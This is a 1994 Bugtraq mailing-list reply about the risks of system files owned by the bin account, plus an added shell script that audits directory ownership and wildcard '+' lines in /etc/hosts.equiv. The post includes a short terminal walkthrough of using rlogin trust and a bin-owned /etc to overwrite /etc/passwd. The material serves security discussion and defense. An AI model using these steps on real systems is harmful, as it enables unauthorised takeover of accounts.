Bugtraq mailing list archives
Re: bin ownership problem
From: george () siltrain demon co uk (George Hodson)
Date: Thu, 19 May 94 13:36:37 BST
Ok, I'll expose my ignorance and ask, what is the specific vulnerability of bin owned files? I understand how it is a problem on NFS exported files to insecure hosts, but what is the risk for files/dirs on a locally non-exported file system? What about groups, is bin a bad group also?

The main problem I've ever had with bin owning system files and other user id's owning things as well (daemon, games, etc) is that it's just that much more to watch for. With root owning all the important stuff it centers your attention on that userid and prevention with just one userid.
Also, another (similar) problem is when a host is trusted (recall /etc/hosts.equiv comes with a default "+" on some systems).

    trusted# su - bin
    trusted# rlogin gotcha
    gotcha$ who am i
    gotcha!bin ttyp3 May 17 08:54
    gotcha$ ls -lgd /etc
    drwxr-sr-x 9 bin staff 2048 May 19 07:08 /etc
    gotcha$ cd /etc;mv passwd passwd.bak
    gotcha$ vi passwd #read in passwd.old, make changes etc...

bad news!

George
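
A defender-side check for the two conditions this message describes (a system directory such as /etc owned by a non-root account, and a wildcard "+" entry in /etc/hosts.equiv), as an added example that is not part of the original post. The function names, the TRUSTED_UID variable and the list of directories are assumptions of this sketch.

```shell
#!/bin/sh
# Added example, not from the original post.
# TRUSTED_UID is an assumption of this sketch (0 = root); override it to test.
TRUSTED_UID="${TRUSTED_UID:-0}"

# Print "uid path" for each existing directory not owned by TRUSTED_UID.
# A directory's owner can rename or replace the entries in it (as done to
# /etc/passwd in the post), whatever the ownership of the files themselves.
dirs_not_owned_by_trusted() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        # ls -n prints numeric ids; field 3 is the owner uid.
        uid=$(ls -ldn "$d" | awk '{print $3}')
        [ "$uid" = "$TRUSTED_UID" ] || printf '%s %s\n' "$uid" "$d"
    done
}

# Print "file:lineno: text" for each line of a hosts.equiv-style file whose
# host field is a bare "+" (trust every host). Netgroup entries such as
# "+@group" and lines starting with "#" are not reported.
wildcard_trust_lines() {
    [ -f "$1" ] || return 0
    awk -v f="$1" '$1 == "+" { printf "%s:%d: %s\n", f, NR, $0 }' "$1"
}

# Run both checks under an optional root prefix (empty = the live system).
audit() {
    root="${1:-}"
    dirs_not_owned_by_trusted "$root/etc" "$root/bin" "$root/usr/bin" "$root/usr/lib"
    wildcard_trust_lines "$root/etc/hosts.equiv"
}

audit "$@"
```

No output means neither condition was found; pass a mount point as the first argument to audit an offline image instead of the running system.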